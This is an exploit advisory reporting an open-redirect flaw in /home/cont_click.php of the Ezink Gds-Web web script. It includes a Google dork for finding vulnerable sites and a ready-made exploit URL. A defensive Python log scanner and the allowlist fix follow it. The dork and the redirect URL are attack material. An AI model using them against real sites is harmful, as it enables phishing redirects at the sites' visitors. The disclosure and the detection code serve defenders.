Desarollo por Ezink Gds-Web Open Redirection Vulnerability
# Exploit Title : Desarollo por Ezink Gds-Web Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/10/2019
# Vendor Homepage : ezink.com - gds-web.com.ar
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/home/cont_click.php?url=
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Vulnerable File :
*****************
/home/cont_click.php
# Vulnerable Parameters :
***********************
?url=
&idcamp=
# Open Redirection Exploit :
**************************
/home/cont_click.php?url=[REDIRECTADDRESS.GOV]&idcamp=[ID-NUMBER]
####################################################################
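Added example (not part of the original advisory or the vendor's code): a log check a defender could run to find requests to the reported endpoint whose url= value would send the visitor off-site. The endpoint path and parameter name come from the advisory; the allowed host, the access-log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/home/cont_click.php"          # path named in the advisory
# Assumed combined-log request field: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_offsite(target, allowed_hosts):
    """True if a redirect target would leave the allowed hosts."""
    # Browsers drop control characters and treat "\" as "/", so normalise first.
    t = re.sub(r"[\x00-\x20]", "", target).replace("\\", "/")
    try:
        parts = urlsplit(t)
    except ValueError:
        return True                        # unparseable target: treat as hostile
    if not parts.scheme and not parts.netloc:
        return False                       # plain relative path stays on the site
    if parts.scheme and parts.scheme not in ("http", "https"):
        return True                        # non-web schemes are never valid here
    host = (parts.hostname or "").lower()  # hostname ignores any user@ prefix
    return host not in allowed_hosts

def suspicious_redirects(log_lines, allowed_hosts):
    """Return (line_no, target) for endpoint hits whose url= points off-site."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        req = urlsplit(m.group(1))
        if req.path != ENDPOINT:
            continue
        # parse_qs percent-decodes, so encoded targets are compared in clear form
        for target in parse_qs(req.query).get("url", []):
            if is_offsite(target, allowed_hosts):
                hits.append((n, target))
    return hits

SAMPLE_LOG = [  # constructed lines; hosts and addresses are reserved example values
    '203.0.113.5 - - [04/Oct/2019:10:00:01 +0000] "GET /home/cont_click.php?url=/promo/index.php&idcamp=12 HTTP/1.1" 302 0',
    '203.0.113.9 - - [04/Oct/2019:10:00:07 +0000] "GET /home/cont_click.php?url=http%3A%2F%2Fother.example%2Flogin&idcamp=12 HTTP/1.1" 302 0',
    '203.0.113.9 - - [04/Oct/2019:10:00:09 +0000] "GET /home/cont_click.php?url=%2F%5Cother.example&idcamp=7 HTTP/1.1" 302 0',
    '203.0.113.7 - - [04/Oct/2019:10:00:12 +0000] "GET /home/cont_click.php?url=https://site.example/a&idcamp=3 HTTP/1.1" 302 0',
    '203.0.113.7 - - [04/Oct/2019:10:00:15 +0000] "GET /index.php?url=http://other.example/ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for n, target in suspicious_redirects(SAMPLE_LOG, {"site.example"}):
        print(f"line {n}: off-site redirect target {target!r}")
```

The same is_offsite() test, applied server-side before the redirect is issued, is the usual fix for CWE-601: redirect only to relative paths or to hosts on an explicit allowlist.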